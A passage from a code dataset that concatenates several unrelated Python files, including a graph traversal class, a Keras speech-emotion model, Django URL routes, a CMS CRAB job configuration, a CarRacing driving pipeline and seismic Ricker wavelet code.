\n# The nodes are sometimes also referred to as vertices and the edges are lines or \n# arcs that connect any two nodes in the graph.\n# USES: Social Networks, Location/ Mapping, Routing Algos, Visual Hierarchy, File System Organizations.\nclass Graph:\n\tdef __init__(self):\n\t\tself.adjacencyList = {}\n\n# ----------------METHOD 01---------------------#\n\t# COMPLEXITY = TIME: O(1), SPACE: O(|V| + |E|)\n\tdef addVertex(self, vertex_name):\n\t\tif vertex_name not in self.adjacencyList:\n\t\t\tself.adjacencyList[vertex_name] = []\n\t\treturn self.adjacencyList\n# ----------------METHOD 01---------------------#\n\n# ----------------METHOD 02---------------------#\n\t# COMPLEXITY = TIME: O(1), SPACE: O(|V| + |E|)\n\tdef addEdge(self, vertex1, vertex2):\n\t\tself.adjacencyList[vertex1].append(vertex2)\n\t\tself.adjacencyList[vertex2].append(vertex1)\n\t\treturn self.adjacencyList\n# ----------------METHOD 02---------------------#\n\n# ----------------METHOD 03---------------------#\n\t# COMPLEXITY = TIME: O(E), SPACE: O(1)\n\tdef removeEdge(self, vertex1, vertex2):\n\t\tself.adjacencyList[vertex1].remove(vertex2)\n\t\tself.adjacencyList[vertex2].remove(vertex1)\n\t\treturn self.adjacencyList\n# ----------------METHOD 03---------------------#\n\n# ----------------METHOD 04---------------------#\n\t# COMPLEXITY = TIME: O(|V| + |E|), SPACE: O(1)\n\tdef removeVertex(self, vertex2):\n\t\tlst = self.adjacencyList[vertex2].copy()\n\t\tfor vertex1 in lst:\n\t\t\tself.removeEdge(vertex1, vertex2)\n\t\tdel self.adjacencyList[vertex2]\n\t\treturn self.adjacencyList\n# ----------------METHOD 04---------------------#\n\n# ----------------METHOD 05---------------------#\n\n\tdef DFSRecursive(self, vertex, results = None):\n\t\t# default to None instead of []: a mutable default list is created once and shared by every call,\n\t\t# so repeated calls would keep appending to the results of earlier traversals\n\t\tif results is None:\n\t\t\tresults = []\n\t\tlst = self.adjacencyList\n\t\tif lst[vertex] is None: return None\n\t\tresults.append(vertex)\n\t\tfor vert in self.adjacencyList[vertex]:\n\t\t\tif vert not in results:\n\t\t\t\tself.DFSRecursive(vert, results)\n\t\treturn results\n\n# ----------------METHOD 05---------------------#\n\n# ----------------METHOD 06---------------------#\n\n\tdef DFSIterative(self, vertex):\n\t\tlst = self.adjacencyList\n\t\tif lst[vertex] is None: return None\n\t\tstacks = []\n\t\tresults = []\n\t\tstacks.append(vertex)\n\t\twhile len(stacks) != 0:\n\t\t\tnode = stacks.pop()\n\t\t\tresults.append(node)\n\t\t\tfor vert in lst[node]:\n\t\t\t\tif vert not in results and vert not in stacks:\n\t\t\t\t\tstacks.append(vert)\n\t\treturn results\n\n# ----------------METHOD 06---------------------#\n\n# ----------------METHOD 07---------------------#\n\n\tdef BFSIterative(self, vertex):\n\t\tlst = self.adjacencyList\n\t\tif lst[vertex] is None: return None\n\n\t\tresults = []\n\t\tqueue = [vertex]\n\t\twhile len(queue) != 0:\n\t\t\tnode = queue.pop(0)\n\t\t\tresults.append(node)\n\t\t\tfor vert in lst[node]:\n\t\t\t\tif vert not in queue and vert not in results:\n\t\t\t\t\tqueue.append(vert)\n\t\treturn results\n\n# ----------------METHOD 07---------------------#\n\n# ----------------Weighted Graph---------------------#\nclass WeightedGraph:\n\tdef __init__(self):\n\t\tself.adjacencyList = {}\n\n# ----------------METHOD 01---------------------#\n\t\n\tdef addVertex(self, vertex_name):\n\t\tif vertex_name not in self.adjacencyList:\n\t\t\tself.adjacencyList[vertex_name] = []\n\t\treturn self.adjacencyList\n\n# ----------------METHOD 01---------------------#\n\n# ----------------METHOD 02---------------------#\n\t\n\tdef addEdge(self, vertex1, vertex2, 
weight):\n\t\tself.adjacencyList[vertex1].append({\"node\":vertex2, \"weight\": weight})\n\t\tself.adjacencyList[vertex2].append({\"node\":vertex1, \"weight\": weight})\n\t\treturn self.adjacencyList\n\n# ----------------METHOD 02---------------------#\nprint('****************************')\n\n\ngraph_rec = Graph()\ngraph_rec.addVertex('A')\ngraph_rec.addVertex('B')\ngraph_rec.addVertex('C')\ngraph_rec.addVertex('D')\ngraph_rec.addVertex('E')\ngraph_rec.addVertex('F')\ngraph_rec.addEdge('A', 'B')\ngraph_rec.addEdge('A', 'C')\ngraph_rec.addEdge('B', 'D')\ngraph_rec.addEdge('C', 'E')\ngraph_rec.addEdge('D', 'E')\ngraph_rec.addEdge('D', 'F')\nprint(graph_rec.addEdge('F', 'E'))\nprint(graph_rec.DFSRecursive('A')) # ['A', 'B', 'D', 'E', 'C', 'F']\nprint(graph_rec.DFSIterative('A')) # ['A', 'C', 'E', 'F', 'D', 'B']\nprint(graph_rec.BFSIterative('B')) # ['B', 'A', 'D', 'C', 'E', 'F']\n\nweightedGraph = WeightedGraph()\nweightedGraph.addVertex(\"A\")\nweightedGraph.addVertex(\"B\")\nweightedGraph.addVertex(\"C\")\nprint(weightedGraph.addEdge(\"A\", \"B\", 250)) # {'A': [{'node': 'B', 'weight': 250}], 'B': [{'node': 'A', 'weight': 250}], 'C': []}\nprint(weightedGraph.addEdge(\"C\", \"B\", 30)) # {'A': [{'node': 'B', 'weight': 250}], 'B': [{'node': 'A', 'weight': 250}, {'node': 'C', 'weight': 30}], 'C': [{'node': 'B', 'weight': 30}]}","sub_path":"47_Practice/48_Graph_Traversal/GraphTraversal.py","file_name":"GraphTraversal.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"25367815","text":"from typing import Dict\n\nimport torch\n\nfrom kwja.metrics.base import BaseModuleMetric\nfrom kwja.metrics.utils import unique\n\n\nclass Seq2SeqModuleMetric(BaseModuleMetric):\n STATE_NAMES = (\n \"example_ids\",\n \"loss\",\n )\n\n def __init__(self):\n super().__init__()\n\n self.example_ids: torch.Tensor\n self.loss: torch.Tensor\n\n def compute(self) -> Dict[str, float]:\n sorted_indices = unique(self.example_ids)\n for state_name in self.STATE_NAMES:\n state = getattr(self, state_name)\n if state_name != \"loss\":\n setattr(self, state_name, state[sorted_indices])\n\n metrics: Dict[str, float] = {\n \"seq2seq_loss\": self.loss.mean().item(),\n }\n return metrics\n","sub_path":"src/kwja/metrics/seq2seq.py","file_name":"seq2seq.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"296411299","text":"'''\nNew conv1d + LSTM model for mfcc40 features\nCreated on December 9, 2020 at 1100\nhttps://github.com/vandana-rajan/1D-Speech-Emotion-Recognition/blob/master/cnn1d.py\n'''\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, Input\nfrom tensorflow.keras.layers import Activation, BatchNormalization\nfrom tensorflow.keras.layers import Conv1D, Conv2D, LSTM\nfrom tensorflow.keras.layers import AveragePooling1D, GlobalAveragePooling2D, MaxPooling1D\nfrom tensorflow.keras.models import Model, model_from_json, Sequential\n\ndef conv1d_lstm(input_shape):\n \n learning_rate = 0.0001\n decay = 1e-6\n momentum = 0.9\n num_classes=3\n num_fc = 64\n \n model = Sequential(name='conv1d_lstm')\n \n # LFLB1\n model.add(Conv1D(filters = 64,kernel_size = (3),strides=1,padding='same',data_format='channels_last',input_shape=input_shape))\t\n model.add(BatchNormalization())\n model.add(Activation('elu'))\n model.add(MaxPooling1D(pool_size = 4, strides = 4))\n\n #LFLB2\n model.add(Conv1D(filters=64, 
kernel_size = 3, strides=1,padding='same'))\n model.add(BatchNormalization())\n model.add(Activation('elu'))\n model.add(MaxPooling1D(pool_size = 4, strides = 4))\n\n #LFLB3\n model.add(Conv1D(filters=128, kernel_size = 3, strides=1,padding='same'))\n model.add(BatchNormalization())\n model.add(Activation('elu'))\n model.add(MaxPooling1D(pool_size = 4, strides = 4))\n\n #LFLB4\n model.add(Conv1D(filters=128, kernel_size = 3, strides=1,padding='same'))\n model.add(BatchNormalization())\n model.add(Activation('elu'))\n model.add(MaxPooling1D(pool_size = 4, strides = 4))\n\n #LSTM\n model.add(LSTM(units=num_fc)) \n\n #FC\n model.add(Dense(units=num_classes,activation='softmax'))\n\n #Model compilation\t\n opt = tf.keras.optimizers.SGD(lr = learning_rate, decay=decay, momentum=momentum, nesterov=True)\n model.compile(optimizer=opt,loss='categorical_crossentropy',metrics=['categorical_accuracy'])\n\n return model","sub_path":"models/model_e_conv1d_lstm.py","file_name":"model_e_conv1d_lstm.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"358149020","text":"# [ ] create, call and test the str_analysis() function\r\n# then PASTE THIS CODE into edX\r\ndef string_analysis(a_string):\r\n if a_string.isdigit():\r\n if int(a_string) >= 99:\r\n print(a_string + ' is a pretty big number.')\r\n elif int(a_string) < 99:\r\n print(a_string + ' is a rather small number.')\r\n elif a_string.isalpha():\r\n print('\"' + a_string + '\"' + ' is all alphabetical characters.')\r\n else:\r\n print('\"' + a_string + '\"' + ' is neither all digits or all alphabetical characters.')\r\n\r\n\r\nuser_in = ''\r\n\r\nwhile user_in == '':\r\n user_in = input('Enter a word or an integer.')\r\n\r\nstring_analysis(user_in)\r\n","sub_path":"edx_codingAssignments/Module-4-StringAnalysis.py","file_name":"Module-4-StringAnalysis.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"91719538","text":"# Copyright (c) 2018, DjaoDjin inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\n# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nfrom django.conf.urls import url\n\nfrom ...api.matrix import (MatrixCreateAPIView, MatrixDetailAPIView,\n    EditableFilterListAPIView, EditableFilterDetailAPIView,\n    AccountListAPIView, QuestionListAPIView)\nfrom ... import settings\n\nurlpatterns = [\n    url(r'^filters/(?P%s)/?' % settings.SLUG_RE,\n        EditableFilterDetailAPIView.as_view(), name='editable_filter_api'),\n    url(r'^filters/?',\n        EditableFilterListAPIView.as_view(), name='editable_filter_api_base'),\n    url(r'^accounts/(?P%s)/?' % settings.SLUG_RE,\n        AccountListAPIView.as_view(), name='accounts_api'),\n    url(r'^accounts/?',\n        AccountListAPIView.as_view(), name='accounts_api_base'),\n    url(r'^questions/(?P%s)/?' % settings.SLUG_RE,\n        QuestionListAPIView.as_view(), name='questions_api'),\n    url(r'^questions/?',\n        QuestionListAPIView.as_view(), name='questions_api_base'),\n    url(r'^(?P%s)/?' % settings.PATH_RE,\n        MatrixDetailAPIView.as_view(), name='matrix_api'),\n    url(r'^',\n        MatrixCreateAPIView.as_view(), name='matrix_api_base'),\n]\n","sub_path":"survey/urls/api/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"628096128","text":"# -*- coding:utf-8 -*-\n\n'''\n#@Author: Magician\n#@Date: 2020-09-22 19:23:50 \n#@Description: \n\nCopyright 2020 by Magician\n'''\n\nfrom os import name\nimport struct\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy.lib.type_check import nan_to_num\n\nimport pylab as pl\nfrom scipy import integrate\nfrom scipy.optimize import curve_fit\n\nbinFile = open('E:\\\\PET\\\\数据集\\\\6BDM.samples','rb')\npoly = binFile.read()\nprint(\"byte length:\",len(poly))\nframe = int(len(poly)/68)+1\nprint(\"frame count:\",frame-1)\n\ncircle = 6500 # how many groups of data to analyze (an .xls file tops out at 65536 rows)\n\nglobal x_rate, y_rate \nglobal popt,popt_dict\nglobal space\nglobal bounds\n\nx_rate = 1 # scale factor for the x units\ny_rate = 1000 # scale factor for the y units\nspace = 2000\npopt = []\npopt_dict = ['a','b','d']\nvoltage_threshold = [40,110,180,270,270,180,110,40]\ny = np.array(voltage_threshold)\nbounds = ([-1000,-2,0],[0,0,2])\n\nEnergy_list = []\nEnergy_mean = 21875.05167\nglobal max_value,normal\nmax_value = 40000\nnormal = 511\nglobal gx_rate,gy_rate\ngx_rate = 100\ngy_rate = 1600\nglobal bins_w\nbins_w = 1000\n\ndef double_exp(x,a,b,d):\n    \"\"\"double-exponential pulse model\n    Parameters:\n    ------------\n    x : float\n        time difference between the current time and the pulse onset\n    a : float\n        set by the pulse amplitude\n    b, d: float\n        set by the rise and fall times of the pulse\n    \"\"\"\n    return a*np.exp(b*(x))*(1-np.exp(d*(x)))\n\ndef gaussian_singletrue(x,*param):\n    '''\n    Gaussian peak of the true events\n    '''\n    return param[1]*np.exp(-np.power(x - param[3], 2.) / (2 * np.power(param[5], 2.)))\n\ndef gaussian_2(x,*param):\n    '''two-component Gaussian fit\n\n    '''\n    return param[0]*np.exp(-np.power(x - param[2], 2.) / (2 * np.power(param[4], 2.)))+\\\n        param[1]*np.exp(-np.power(x - param[3], 2.) 
/ (2 * np.power(param[5], 2.)))\n\ndef func(x):\n    return popt[0]*np.exp(popt[1]*(x))*(1-np.exp(popt[2]*(x)))\n\ndef assert_popt(popt,bounds,num):\n    '''check whether the fitted parameters need adjusting\n    Parameters:\n    --------\n    popt: the fitted parameters\n    bounds: the parameter bounds\n    num: this is the (num+1)-th fit\n    '''\n    for i in range(3):\n        assert (popt[i]!=bounds[0][i]), \"the lower bound of parameter %s should be adjusted!!!\\nthe double-exponential fitted for frame %d is: %f*exp(%f*(x))*(1-exp(%f*(x)))\"%(popt_dict[i],num+1,popt[0],popt[1],popt[2])\n        assert (popt[i]!=bounds[1][i]), \"the upper bound of parameter %s should be adjusted!!!\\nthe double-exponential fitted for frame %d is: %f*exp(%f*(x))*(1-exp(%f*(x)))\"%(popt_dict[i],num+1,popt[0],popt[1],popt[2])\n\ndef draw_hist(lenths):\n    \n    # plot the raw histogram\n    bins1 = np.linspace(min(lenths),max(lenths),bins_w)\n    n1, bins1, patches1 = pl.hist(lenths,bins1)\n\n    # normalize the energy spectrum\n    n12 = n1.tolist()\n    frequent_index = n12.index(max(n12)) \n    data = lenths*511/(0.5*(bins1[frequent_index]+bins1[frequent_index+1]))\n    bins2 = np.linspace(min(data),max(data),bins_w)\n    n2, bins2, patches2 = pl.hist(data,bins2)\n\n    # plot the Gaussian fit\n    # bins has one more element than n\n    # bins = np.delete(bins,-1) # option 1: drop the last element of the list\n    guass_x = []\n    guass_x = np.array(guass_x)\n    guass_y = n2\n    for i in range(len(bins2)-1): # option 2: use the midpoint of the two edges of each bin\n        temp = 0.5*(bins2[i]+bins2[i+1])\n        guass_x = np.append(guass_x,temp)\n    popt,pcov = curve_fit(gaussian_2,guass_x/gx_rate,guass_y/gy_rate,p0=[3,4,3,6,1,1],maxfev = 140000)\n\n    plt.figure(\"Gaussian fit\")\n    plt.plot(guass_x,guass_y,'b*:',label='data')\n    plt.plot(guass_x,gaussian_2(guass_x/gx_rate,*popt)*gy_rate,'r',label='fit')\n    plt.legend()\n    plt.show()\n    print(\"Gaussian fit parameters:\",*popt)\n\n    # compute the energy resolution\n    # keep the x coordinates whose height exceeds half the maximum, then take the difference between the first and last entries\n\n    global half_h_w_list\n    half_h_w_list = []\n    high = max(gaussian_singletrue(guass_x/gx_rate,*popt)*gy_rate)\n    for x in guass_x: \n        if(int(gaussian_singletrue(x/gx_rate,*popt)*gy_rate)>int(0.5*high)):\n            half_h_w_list = np.append(half_h_w_list,x)\n    E_max = 511\n    \n    half_h_w = max(half_h_w_list)-min(half_h_w_list)\n    eta = half_h_w/E_max\n    print(\"energy resolution:\",eta)\n    \n\n\nfor i in range(circle):\n    poly_func = poly[i*68:(i+1)*68]\n    content = struct.unpack(' 0.8\n#True\n\nresult = word_vectors.similar_by_word(\"cat\")\nprint(\"{}: {:.4f}\".format(*result[0]))\n#dog: 0.8798\n\nsentence_obama = 'Obama speaks to the media in Illinois'.lower().split()\nsentence_president = 'The president greets the press in Chicago'.lower().split()\n\nsimilarity = word_vectors.wmdistance(sentence_obama, sentence_president)\nprint(\"{:.4f}\".format(similarity))\n#3.4893\n\ndistance = word_vectors.distance(\"media\", \"media\")\nprint(\"{:.1f}\".format(distance))\n#0.0\n\nsim = word_vectors.n_similarity(['sushi', 'shop'], ['japanese', 'restaurant'])\nprint(\"{:.4f}\".format(sim))\n#0.7067\n\nvector = word_vectors['computer'] # numpy vector of a word\nvector.shape\n#(100,)\n\nvector = word_vectors.word_vec('office', use_norm=True) # word_vectors is already a KeyedVectors, so no extra .wv hop\nvector.shape\n#(100,)\n\n#Correlation with human opinion on word similarity--------------------\n\nfrom gensim.test.utils import datapath\n\nsimilarities = model.wv.evaluate_word_pairs(datapath('wordsim353.tsv'))\n\n#And on word analogies\n\nanalogy_scores = model.wv.evaluate_word_analogies(datapath('questions-words.txt'))\n","sub_path":"gensim/gs_similarity.py","file_name":"gs_similarity.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"576693469","text":"\"\"\" In CRAB3 the configuration file is in Python language. 
It consists of creating a Configuration object imported from the WMCore library: \"\"\"\nfrom WMCore.Configuration import Configuration\nconfig = Configuration()\n\n\"\"\" Once the Configuration object is created, it is possible to add new sections into it with corresponding parameters.\"\"\"\n\nworkname='monoH_2016data'\nreqname='scalar_NLO_Mchi-450_Mphi-1000'\ndataset='/BBbarDMJets_scalar_NLO_Mchi-450_Mphi-1000_TuneCUETP8M1_13TeV-madgraph-pythia8/RunIISummer16MiniAODv2-PUMoriond17_80X_mcRun2_asymptotic_2016_TrancheIV_v6-v1/MINIAODSIM'\n\nPERIOD='H'\n\nconfig.section_(\"General\")\nconfig.General.requestName = reqname\nconfig.General.workArea = 'crab_'+workname\nconfig.General.transferOutputs = True\nconfig.General.transferLogs = True\n\nDATAJEC='Summer16_23Sep2016'+PERIOD+'V3_DATA'\n\nconfig.section_(\"JobType\")\nconfig.JobType.pluginName = 'Analysis'\nconfig.JobType.psetName = 'treeMaker_Summer17_cfg.py'\nconfig.JobType.pyCfgParams = ['runOnMC=False','period='+PERIOD]\nconfig.JobType.inputFiles = ['effAreaElectrons_cone03_pfNeuHadronsAndPhotons_25ns.txt','effAreasMuons_cone03_Spring15_25ns.txt',\n'../../../MetaData/data/DNN_models/breg_training_2017.pb',\n'../../TreeMaker/data/BoostedSVDoubleCA15_withSubjet_v4.weights.xml']\n\nconfig.JobType.sendExternalFolder = True\nconfig.JobType.sendPythonFolder = True\n\nconfig.section_(\"Data\")\nconfig.Data.inputDataset = dataset\nconfig.Data.inputDBS = 'global'\nconfig.Data.outputDatasetTag = reqname\nconfig.Data.splitting = 'LumiBased'\n#config.Data.splitting = 'Automatic'\n\nconfig.Data.unitsPerJob = 20\n\n#config.Data.lumiMask = 'https://cms-service-dqm.web.cern.ch/cms-service-dqm/CAF/certification/Collisions16/13TeV/ReReco/Final/Cert_271036-284044_13TeV_23Sep2016ReReco_Collisions16_JSON.txt'\nconfig.Data.lumiMask = 'Cert_294927-306462_13TeV_PromptReco_Collisions17_JSON.txt'#'Cert_271036-284044_13TeV_23Sep2016ReReco_Collisions16_JSON.txt'\n#config.Data.ignoreLocality = True\n\n\nconfig.JobType.allowUndistributedCMSSW=True\n\n\n#maxtarballsize = 50 \nconfig.section_(\"Site\")\n#config.Site.storageSite = \"T3_TW_NCU\"\nconfig.Site.storageSite = \"T2_CH_CERN\"\n##config.Site.storageSite = \"T2_US_Wisconsin\" \n#config.Site.storageSite = \"T2_TW_NCHC\" \n\nconfig.Data.outLFNDirBase = '/store/group/phys_exotica/bbMET/2017_ntuples/%s' %(workname) \n","sub_path":"CrabUtilities/MultiCrab/crabConfig_data.py","file_name":"crabConfig_data.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"452886593","text":"import os\nimport sys\nimport gym\nfrom gym.envs.box2d.car_racing import CarRacing\nfrom lane_detection import LaneDetection\nfrom waypoint_prediction import waypoint_prediction, target_speed_prediction\nfrom lateral_control import LateralController\nfrom longitudinal_control import LongitudinalController\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pyglet\nfrom pyglet import gl\nfrom pyglet.window import key\n\n\ndef evaluate():\n \"\"\"\n \"\"\"\n\n # action variables\n a = np.array( [0.0, 0.0, 0.0] )\n\n # init environement\n env = CarRacing()\n env.render()\n env.reset()\n\n\n for episode in range(5):\n observation = env.reset()\n # init modules of the pipeline\n LD_module = LaneDetection()\n LatC_module = LateralController()\n LongC_module = LongitudinalController()\n reward_per_episode = 0\n for t in range(500):\n # perform step\n s, r, done, speed, info = env.step(a)\n\n # lane detection\n lane1, lane2 = 
LD_module.lane_detection(s)\n\n # waypoint and target_speed prediction\n waypoints = waypoint_prediction(lane1, lane2)\n target_speed = target_speed_prediction(waypoints, max_speed=60, exp_constant=4.5)\n\n # control\n a[0] = LatC_module.stanley(waypoints, speed)\n a[1], a[2] = LongC_module.control(speed, target_speed)\n\n # reward\n reward_per_episode += r\n env.render()\n\n print('episode %d \\t reward %f' % (episode, reward_per_episode))\n\n\n\ndef calculate_score_for_leaderboard():\n \"\"\"\n Evaluate the performance of the network. This is the function to be used for\n the final ranking on the course-wide leader-board, only with a different set\n of seeds. Better not change it.\n \"\"\"\n # action variables\n a = np.array( [0.0, 0.0, 0.0] )\n\n # init environement\n env = CarRacing()\n env.render()\n env.reset()\n\n seeds = [22597174, 68545857, 75568192, 91140053, 86018367,\n 49636746, 66759182, 91294619, 84274995, 31531469]\n\n\n total_reward = 0\n\n for episode in range(10):\n env.seed(seeds[episode])\n observation = env.reset()\n\n # init modules of the pipeline\n LD_module = LaneDetection()\n LatC_module = LateralController()\n LongC_module = LongitudinalController()\n\n reward_per_episode = 0\n for t in range(600):\n # perform step\n s, r, done, speed, info = env.step(a)\n\n # lane detection\n lane1, lane2 = LD_module.lane_detection(s)\n\n # waypoint and target_speed prediction\n waypoints = waypoint_prediction(lane1, lane2)\n target_speed = target_speed_prediction(waypoints, max_speed=60, exp_constant=4.5)\n\n # control\n a[0] = LatC_module.stanley(waypoints, speed)\n a[1], a[2] = LongC_module.control(speed, target_speed)\n\n # reward\n reward_per_episode += r\n\n env.render()\n\n print('episode %d \\t reward %f' % (episode, reward_per_episode))\n total_reward += np.clip(reward_per_episode, 0, np.infty)\n\n print('---------------------------')\n print(' total score: %f' % (total_reward / 10))\n print('---------------------------')\n\nif __name__ == \"__main__\":\n if sys.argv[1] == \"test\":\n evaluate()\n elif sys.argv[1] == \"score\":\n if len(sys.argv) == 3:\n trained_network_file = os.path.join(directory, sys.argv[2])\n calculate_score_for_leaderboard(trained_network_file)\n else:\n calculate_score_for_leaderboard()\n else:\n print('This command is not supported, use '\n 'test or score.')\n","sub_path":"exercise_03_modular_pipeline/template/modular_pipeline.py","file_name":"modular_pipeline.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"134460118","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\n\ndef ricker(f=None, n=None, dt=None, t0=None, t1=None):\n \"\"\"\n RICKER creates an causal ricker wavelet signal\n\n RICKER creates and plots a default causal ricker wavelet with:\n\n peak frequency = 20 Hz\n sampling time = 0.001 seconds\n number of points = 100;\n peak location = 1/F = 1/20Hz\n\n RW = RICKER(...) returns the default wavelet in RW.\n\n [RW,T] = RICKER(...) 
returns the time vector in T.\n\n Specifying parameters of peak frequency (F, Hz), number of points (N),\n and sampling time (DT) are specified by the syntax:\n\n [RW,T] = RICKER(F)\n [RW,T] = RICKER(F,N)\n [RW,T] = RICKER(F,N,DT)\n\n [RW,T] = RICKER(F,N,DT,T0) creates a ricker wavelet with peak centered\n at T0.\n\n [RW,T] = RICKER(F,N,DT,T0,T1) creates a 2 dimensional symmetric\n ricker wavelet with sift in 1st dimension of T0 and second dimension of\n T1.\n\n Example 1:\n ricker % plots a 20 Hz Ricker Wavelet over 0.1 seconds\n\n Example 2:\n % create a ricker wavelet with 40 Hz, 200 points, and 0.02 s between\n % samples\n [rw,t] = ricker(40,200,0.002);\n plot(t,rw), xlabel('Time'), ylabel('Amplitude')\n \"\"\"\n # Define inputs if needed\n\n if f and n and dt and t0:\n if t1 is not None:\n is2d = True\n else:\n is2d = False\n elif f and n and dt:\n t0 = 1/float(f)\n is2d = False\n elif f and n:\n dt = 0.001\n t0 = 1/float(f)\n is2d = False\n elif f:\n n = 100\n dt = 0.001\n t0 = 1/float(f)\n is2d = False\n else:\n f = 20.\n n = 100\n dt = 0.001\n t0 = 1/f\n is2d = False\n\n # Create the wavelet and shift in time if needed\n T = dt*(n-1)\n t = np.arange(0, T+dt, dt)\n tau = t-t0\n if not is2d:\n rw = (\n (1-tau * tau * f**2. * np.pi**2.) *\n np.exp(-tau**2. * np.pi**2. * f**2.)\n )\n else:\n t1, t2 = np.meshgrid(tau, t-t1)\n rw = (\n (1-(t1**2. + t2**2.) * f**2. * np.pi**2.) *\n np.exp(-(t1**2. + t2**2.) * np.pi**2. * f**2.)\n )\n\n return rw, t\n\n\ndef generate_shots(Vp, Vm, Vm0, dt, nt, dx=24, dz=24, animation=True):\n f = 60.\n nz, nx = Vp.shape[:]\n x = np.arange(1, nx+1) * dx\n z = np.arange(1, nz+1) * dz\n\n data = np.zeros((nt, nx))\n\n if animation:\n fig = plt.figure()\n ax = range(4)\n cbar = range(3)\n clim = [-1000, 1000]\n\n ax[0] = plt.subplot2grid((5, 5), (0, 0), colspan=2, rowspan=2)\n ax[1] = plt.subplot2grid((5, 5), (0, 3), colspan=2, rowspan=2)\n ax[2] = plt.subplot2grid((5, 5), (3, 0), colspan=2, rowspan=2)\n ax[3] = plt.subplot2grid((5, 5), (3, 3), colspan=2, rowspan=2)\n\n # subplot(2,2,1)\n iVp = ax[0].imshow(Vp, extent=(dx, nx*dx, nz*dz, dz), cmap='seismic')\n ax[0].plot(x[0], z[0], 'x')\n ax[0].plot(x[0], z[0], '^', color='white')\n ax[0].set_title('c(x)')\n ax[0].set_xlabel('Distance (m)')\n ax[0].set_xlim(dx, nx*dx)\n ax[0].set_ylabel('Depth (m)')\n ax[0].set_ylim(nz*dz, 0)\n cbar[0] = fig.colorbar(iVp, ax=ax[0])\n\n nxi = 1\n for ixs in range(21, 22+nxi): # shot loop\n # initial wavefield\n rw, t = ricker(f, nz+40, dt, dt*ixs, 0)\n rw = rw[0:nz+20]\n\n # generate shot records\n tic = time.time()\n [data, snapshot] = fm2d(Vm, rw, nz, dz, nx, dx, nt, dt)\n toc = time.time()\n msg = \"Elapsed time is %s seconds.\" % (toc-tic)\n print(msg)\n\n tic = time.time()\n [data0, snapshot0] = fm2d(Vm0, rw, nz, dz, nx, dx, nt, dt)\n toc = time.time()\n msg = \"Elapsed time is %s seconds.\" % (toc-tic)\n print(msg)\n\n # data = data(21:end-20,:)'\n # data0 = data0(21:end-20,:)'\n # dataS = data - data0\n\n # save(['Marmousi/snapshot0',num2str(ixs-20),'.mat'],'snapshot0');\n # save(['Marmousi/shotfdm',num2str(ixs-20),'.mat'],'data')\n # save(['Marmousi/shotfdmS',num2str(ixs-20),'.mat'],'dataS')\n\n # plot initial wavefield\n \"\"\"\n set(hshot,'XData',x(ixs-20),'YData',z(1));\n subplot(2,2,2)\n imagesc(x,z,rw(1:end-20,21:end-20))\n xlabel('Distance (m)'); ylabel('Depth (m)');\n title(['Shot ',num2str(ixs-20),' at ',num2str(x(ixs-20)),' m']);\n colormap(seismic(1024))\n\n if ismember(ixs-20,[1 nx/2 nx])\n start = 1;\n else\n start = nt;\n end\n\n for i = start:10:nt\n % 
